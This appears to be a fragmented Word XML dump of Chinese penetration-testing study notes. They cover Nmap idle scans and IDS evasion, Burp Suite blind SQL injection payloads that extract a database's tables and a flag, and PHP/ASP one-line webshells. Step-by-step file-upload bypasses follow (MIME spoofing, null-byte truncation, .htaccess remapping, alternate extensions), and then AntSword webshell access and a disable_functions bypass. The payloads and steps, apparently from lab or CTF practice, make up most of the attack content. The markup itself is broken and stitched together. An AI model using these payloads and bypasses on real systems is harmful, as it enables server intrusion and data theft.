            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="屏幕截图 2023-06-17 22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06-17 2254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利用空闲主机代替本机扫描（安全，不会暴露当前主机）nmap -Pn -sI 空闲主机IP 目标IP。这样目标主机抓包就只会显示空闲主机IP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扫描端口及版本号nmap -n -sV IP端口（查找对应的规范表是File System-usr-share-nmap文件夹中nmap-service-probes文件）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2500" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2023-06-18 1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06-18 11515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扫描操作系统nmap -O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5840" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="屏幕截图 2023-06-18 16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06-18 1614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扫描全部信息nmap -A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26865" cy="4521835"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="17" name="图片 17" descr="屏幕截图 2023-06-18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6-18 1654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38295" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="6985" b="11430"/>
            <wp:docPr id="16" name="图片 16" descr="屏幕截图 2023-06-18 1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06-18 1654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7035" cy="4382770"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="15" name="图片 15" descr="屏幕截图 2023-06-18 16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06-18 1653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逃逸防火墙以及IDS逃逸nmap --mtu 32 -F -v IP端口（-mtu指定便宜大小，-v提高输出详细度）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29100" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="18" name="图片 18" descr="屏幕截图 2023-06-18 22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06-18 2244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保存结果到文件中nmap -F -oN 文件名 IP端口，可以保存为txt格式或者xml格式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556760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2023-06-19 16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06-19 16535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保存结果到支持的所有格式文件中nmap -F -oA test IP端口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1600" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="21" name="图片 21" descr="屏幕截图 2023-06-19 16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06-19 16570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保存结果到支某个文件后面nmap -F -append-output -oN 文件名 IP端口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65680"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="22" name="图片 22" descr="屏幕截图 2023-06-19 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6-19 1659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" w:name="_Toc30635"/>
      <w:bookmarkStart w:id="7" w:name="_Toc32433"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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扫描：在目标输入IP地址进行简单扫描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39085"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10795"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕截图 2023-06-19 16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06-19 1640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配置-编辑选中配置可以更改扫描配置，点击保存会自动在主页面命令中生成nmap指令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960370"/>
            <wp:effectExtent l="0" t="0" r="8890" b="11430"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2023-06-19 16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06-19 1646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" w:name="_Toc5811"/>
      <w:bookmarkStart w:id="9" w:name="_Toc9604"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/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0" w:name="_Toc781"/>
      <w:bookmarkStart w:id="11" w:name="_Toc28705"/>
      <w:bookmarkStart w:id="12" w:name="_Toc506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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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代理设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="1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打开软件，设置代理跟目标浏览器一致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421765"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2023-06-19 17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06-19 1748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3" w:name="_Toc12594"/>
      <w:bookmarkStart w:id="14" w:name="_Toc75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2.爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="1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将Intercept is on开启，这样浏览器访问网址会自动卡主，并在Burp Suite中监听到，之后点击Action-Send to Intruder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728845"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10795"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2023-06-19 17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6-19 1750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转到Intruder菜单的Positions，得到拦截信息，选中想要转换为payload爆破的地方，点击右侧Add按钮，会把选中项变为参数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41730"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2023-06-19 17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6-19 17570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之后在当前菜单的Payloads中，导入爆破文件，会将文件中所有内容依次作为参数值爆破并显示结果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58440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="屏幕截图 2023-06-19 18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6-19 18015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点击上面的Filter......可以对结果进行筛选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7075"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2023-06-19 18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6-19 1805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另外，点击Add from list...这里还有很多现有字典可供使用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3940" cy="3779520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2023-06-19 18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6-19 18120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SQL注入指令爆破，红色是爆破位置，加粗蓝色为标记位：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查个数：4个数据库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/api?field=(substring((select%20count(schema_name)%20from%20information_schema.schemata),1,1) = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4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第4个数据库第1个字母：c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爆破出数据库为：casdoor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/api?field=(substring((select%20schema_name%20from%20information_schema.schemata%20limit%20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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'casdoo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r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查表1名：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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'applicatio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n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查表2名：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a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'rol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e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查表4名：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?field=(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3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'fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>g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查第一列列名：id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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),1,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) = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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查第二列列名：flag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?field=(substring((select%20column_name%20from%20information_schema.columns%20where%20table_schema='casdoor'%20and%20table_name='flag'%20limit%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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查询flag列数据：flag{b}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/api?field=(substring((select group_concat(flag) from flag),§7§,1) = '§a§') &lt;&gt; name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最后一个查询flag数据的时候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第一个变量为1-65个数字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第二个变量为"abcdefghijklmnopqrstuvwxyz0123456789_-!@#$^&amp;*()_+{}[]|\:";',./&lt;&gt;?"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多参数爆破要选择Cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="9525" b="146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之后Payload Sets也要选择这两个，并且都配置好Payload Options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52725"/>
            <wp:effectExtent l="0" t="0" r="3175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15" w:name="_Toc29475"/>
      <w:bookmarkStart w:id="16" w:name="_Toc24918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3.配合AntSword（中国蚁剑）文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16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上传正常图片和一句话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 Burpsuite 的 Proxy-&gt;Intercept 将抓包的状态从关闭改为打开。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20690" cy="3613785"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="36" name="图片 8" descr="IMG_263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6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一句话木马大全：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PHP：&lt;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?php eval($_POST[cc123]) ?&gt;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ASP.net:&lt;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%a=request(“zl”)%&gt;&lt;%eval a%&gt;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/>
        <w:ind w:left="0" w:right="0" w:firstLine="420" w:firstLineChars="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注意一下几种方式要考虑结合使用</w:t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7" w:name="_Toc29930"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）文件类型验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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在浏览器上传PHP文件，回到Burpsuite看到MIME信息（Content-type）为text/plain。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0345" cy="4368800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="41" name="图片 9" descr="IMG_264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53355" cy="4410710"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="37" name="图片 10" descr="IMG_265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 descr="IMG_26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将Content-type后的内容修改为image/jpg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这样服务器就会认为这是一个图片文件了，接下来关闭抓包按钮，这样就成功的绕过MIME验证。上传成功后，我们需要访问文件，这时可直接复制文件路径（File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6055" cy="4714240"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10160"/>
            <wp:docPr id="42" name="图片 11" descr="IMG_266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 descr="IMG_26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使用AntSword软件打开webshell地址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（也就是一句话木马的POST参数名）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，选择脚本类型为PHP，单击添加按钮，最后我们双击指定条目后的可以看到目标网站的目录，这样我们就成功获取到目标网站的WEBShell权限。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14620" cy="3540125"/>
            <wp:effectExtent l="0" t="0" r="12700" b="10795"/>
            <wp:docPr id="44" name="图片 12" descr="IMG_267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6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09540" cy="3533140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="32" name="图片 13" descr="IMG_268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8595" cy="3519805"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="38" name="图片 14" descr="IMG_269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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc30218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）内容验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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打开Burpsuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-HTTP history 找到上传图片的数据包，右键 选择Send to Repeater。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54040" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="40" name="图片 2" descr="IMG_257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在末尾加上几个空格后粘贴一句话，然后修改文件名的尾缀为.php利于之后使用中国菜刀进行连接。空格的作用主要用于隔开图片文件和一句话，避免一句话解析混乱。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581015" cy="2881630"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13970"/>
            <wp:docPr id="33" name="图片 3" descr="IMG_258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在图片末尾,添加一句话木马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@eval($_GET['a']);?&gt;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2898140"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12700"/>
            <wp:docPr id="46" name="图片 4" descr="IMG_259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 descr="IMG_2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设置完成之后,（点击Send 发送数据包），上传数据,查看浏览器发现上传成功，复制File Name后面的信息（例如：uploadimg1412865875.php ）。粘贴复制到网站地址后面，从而构造访问地址（例如：http://www.test.comuploadimg1412865875.php ），并复制访问地址。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0505" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12700"/>
            <wp:docPr id="47" name="图片 5" descr="IMG_260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IMG_2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8125" cy="3589020"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="48" name="图片 6" descr="IMG_261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 descr="IMG_2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001645"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="39" name="图片 7" descr="IMG_262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50510" cy="2896870"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13970"/>
            <wp:docPr id="30" name="图片 8" descr="IMG_263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 descr="IMG_2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提示：如果访问构造好的一句话木马地址报错，可能是因为图片内容影响了一句话木马， 也可以在桌面新建php文件。在里面写入两行内容：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GIF89a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直接上传即可。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5900" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="34" name="图片 9" descr="IMG_264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98135" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
            <wp:docPr id="35" name="图片 10" descr="IMG_265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91455" cy="3402965"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="29" name="图片 11" descr="IMG_266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2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643245" cy="3521075"/>
            <wp:effectExtent l="0" t="0" r="10795" b="14605"/>
            <wp:docPr id="43" name="图片 12" descr="IMG_267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 descr="IMG_2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04155" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="45" name="图片 13" descr="IMG_268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6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9" w:name="_Toc10051"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后缀名验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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php语言除了可以解析以php为后缀的文件，还可以解析php2，php3、php4、php5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、phar、pht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这些后缀的文件。我们可以将文件名修改为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这些后缀依次测试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重新上传。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4315" cy="2564130"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="50" name="图片 1" descr="IMG_256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5105" cy="2860040"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="49" name="图片 2" descr="IMG_257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0815" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:docPr id="52" name="图片 3" descr="IMG_258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7800" cy="2887345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="53" name="图片 4" descr="IMG_259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当使用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某个后缀名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上传成功后，我们需要访问文件，这时可直接复制文件路径（File Name后面的内容，即是一句话的路径），将复制的地址粘贴至网站地址后面，从而构造访问地址，并复制构造好的地址。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20202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5420" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="54" name="图片 5" descr="IMG_260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IMG_26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桌面AntSword软件并填入复制的访问地址，填入你设定的密码,这里设置的密码是a，连接类型为PHP，单击添加按钮，最后我们双击指定条目后的可以看到目标网站的目录，这样我们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7640" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
            <wp:docPr id="55" name="图片 6" descr="IMG_261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 descr="IMG_26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右键空白处，点击添加数据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4888230" cy="3273425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="56" name="图片 7" descr="IMG_262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 descr="IMG_26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13045" cy="3446780"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="51" name="图片 8" descr="IMG_263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 descr="IMG_26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点击添加,成功添加一句话木马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23840" cy="3348990"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
            <wp:docPr id="57" name="图片 9" descr="IMG_264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IMG_26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76520" cy="3357245"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="31" name="图片 10" descr="IMG_265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20" w:name="_Toc32056"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空字节截断目录路径</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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打开BurpSuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-&gt;Intercept 点击 intercept off 改为intercept on，截断的数据包将在关闭抓包的时候发送给服务端。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161915" cy="2812415"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="64" name="图片 11" descr="IMG_256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点击上传图片抓到包之后，可以看到，filename 后面即是上传的路径，uploading则是保存在服务器上的地址。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2405" cy="3568065"/>
            <wp:effectExtent l="0" t="0" r="635" b="13335"/>
            <wp:docPr id="62" name="图片 12" descr="IMG_257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 descr="IMG_25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3835" cy="3355975"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="65" name="图片 13" descr="IMG_258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 descr="IMG_25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将uploadimg改为uploadimg/1.php .jpg ，并选中空格` ,接着我们来到 这个右边，修改code编码，找到同一行的数字20，改为00点击Apply changes`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9390" cy="3032125"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="66" name="图片 14" descr="IMG_259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 descr="IMG_25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20(空格字符的16进制)改成00(截断字符的16进制）这样以来。截断字符后面的都会被截断，也就是忽略掉了，所以uploadimg/1.php .jpg 就变成了uploadimg/1.php 达到了上传PHP文件的目的。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84470" cy="2912110"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="63" name="图片 15" descr="IMG_260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 descr="IMG_26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将数据包中的内容删除，并修改上传内容，将数据包中的内容修改为一句话木马，点击发送Forward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&lt;?php @eval($_POST['a']);?&gt;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删除前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210" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10160"/>
            <wp:docPr id="74" name="图片 16" descr="IMG_261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 descr="IMG_26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删除后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2804160"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="72" name="图片 17" descr="IMG_262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 descr="IMG_26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修改内容，注意：修改的内容在第二行输入木马才是生效的如图所示：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868930"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="68" name="图片 18" descr="IMG_263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IMG_26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370195" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
            <wp:docPr id="70" name="图片 19" descr="IMG_264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 descr="IMG_26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修改完成后，发送数据包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73675" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:docPr id="71" name="图片 20" descr="IMG_265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 descr="IMG_26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返回浏览器，查看发送的数据包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9705" cy="3113405"/>
            <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
            <wp:docPr id="73" name="图片 21" descr="IMG_266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6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可以看到上传成功，地址为uploading/1.php.jpg。复制这段内容uploadimg/1.php并访问，访问成功表示一句话上传成功。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9865" cy="3173730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="11430"/>
            <wp:docPr id="75" name="图片 22" descr="IMG_267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 descr="IMG_26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204210"/>
            <wp:effectExtent l="0" t="0" r="6350" b="11430"/>
            <wp:docPr id="67" name="图片 23" descr="IMG_268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 descr="IMG_26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打开AntSword软件并填入复制的访问地址，填入设定的密码,这里设置的密码是a，选择连接类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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67325" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="69" name="图片 24" descr="IMG_269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 descr="IMG_26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打开中国蚁剑，右键选择添加数据，并将一句话木马地址复制进去。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2085" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="60" name="图片 25" descr="IMG_270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 descr="IMG_27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36845" cy="3517265"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="61" name="图片 26" descr="IMG_271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 descr="IMG_27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51450" cy="3409315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="59" name="图片 27" descr="IMG_272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 descr="IMG_27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28BCA"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5241290" cy="2870835"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="58" name="图片 28" descr="IMG_273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7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最终获取了 Webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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21" w:name="_Toc26669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传路径验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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在Burp Suite抓包之后，可以修改上传文件的保存路径来绕过文件上传路径过滤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017135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="77" name="图片 77" descr="屏幕截图 2023-06-23 1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3-06-23 17542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接下来步骤与上面相同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc9153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六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.htaccess文件绕过检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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编写.htaccess文件。打开记事本，将如下代码写入文本中：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AddType  application/x-httpd-php    .jpg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然后点击文件选中另存为，编写文件名为.htaccess，选择保存类型为所有文件。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27320" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="8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300980" cy="3883660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="9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IMG_25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8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4092575"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="7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 descr="IMG_25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0500" cy="5813425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8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 descr="IMG_25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.htaccess文件里的代码的含义 是 将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件。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55260" cy="3542665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="7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 descr="IMG_26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将.htaccess文件进行上传,上传成功。使用BURP 抓包将.htaccess.txt 修改为.htaccess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4310" cy="3653155"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445"/>
            <wp:docPr id="8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6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72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.htaccess是apache服务器中的一个配置文件,不是上传的文件的黑名单之内 ,所以.htaccess文件是可以上传成功。把一句话文件的后缀名为yijuhua.php改为后缀名为jpg格式 。上传成功到服务器的.htaccess文件里的代码可以让 .jpg后缀名文件格式的文件名以 php格式解析 所以我们把yijuhua.php文件的后缀名改为.jpg格式,让.htaccess文件解析 yijuhua.jpg文件里的php代码 ,使木马上传成功。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67325" cy="3233420"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="8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 descr="IMG_26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39385" cy="4692650"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="8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 descr="IMG_26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上传成功之后,复制上传路径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打开桌面AntSword软件并填入复制的访问地址，填入设定的密码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选择脚本类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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08270" cy="3329940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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在空白处点击鼠标右键 选择添加。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187950" cy="3733165"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="9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 descr="IMG_26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访问木马地址,复制链接然后输入上传一句话里文件里设置的密码为 a,选择相应的脚本类型,这里上传的是php脚本 点击添加。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1770" cy="3488690"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="80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 descr="IMG_26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双击点击打开地址,连接成功,可以成功看到 uploadimg文件夹下有一个 key文件。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73040" cy="3954780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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右键点击编辑 可以看到字符串 说明一句话木马上传成功。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86375" cy="3601720"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="82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 descr="IMG_27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bookmarkStart w:id="23" w:name="_Toc29403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七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权限限制绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23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将插件放在antSword-master\antData\plugins文件夹下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，这样在请求数据行右键-&gt;加载插件-&gt;绕过disable_functions，即可使用插件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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4647565" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795"/>
            <wp:docPr id="19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选择对应的模式点击开始即可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27220" cy="4701540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="19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4" w:name="_Toc2316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内容编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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在Repeater中，可以通过选中修改部分右键-&gt;Convert selection-&gt;URL-&gt;下的选项进行url编码，避免不识别空格等问题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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4116070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="159" name="图片 159" descr="屏幕截图 2023-08-30 20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屏幕截图 2023-08-30 2005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在爆破的时候，通过Payload Process中Add-&gt;选择加密格式-OK，设置payload字典的编码格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numP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0500" cy="1811655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1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25" w:name="_Toc21856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请求格式转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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右键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选择Change request method即可，如果是get请求变为post请求，注意传参的Content-Type是否需要修改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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4046220" cy="4351020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="160" name="图片 160" descr="屏幕截图 2023-08-30 23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屏幕截图 2023-08-30 2346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6" w:name="_Toc5718"/>
      <w:bookmarkStart w:id="27" w:name="_Toc32058"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Joomla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27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查找漏洞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信息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4625340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
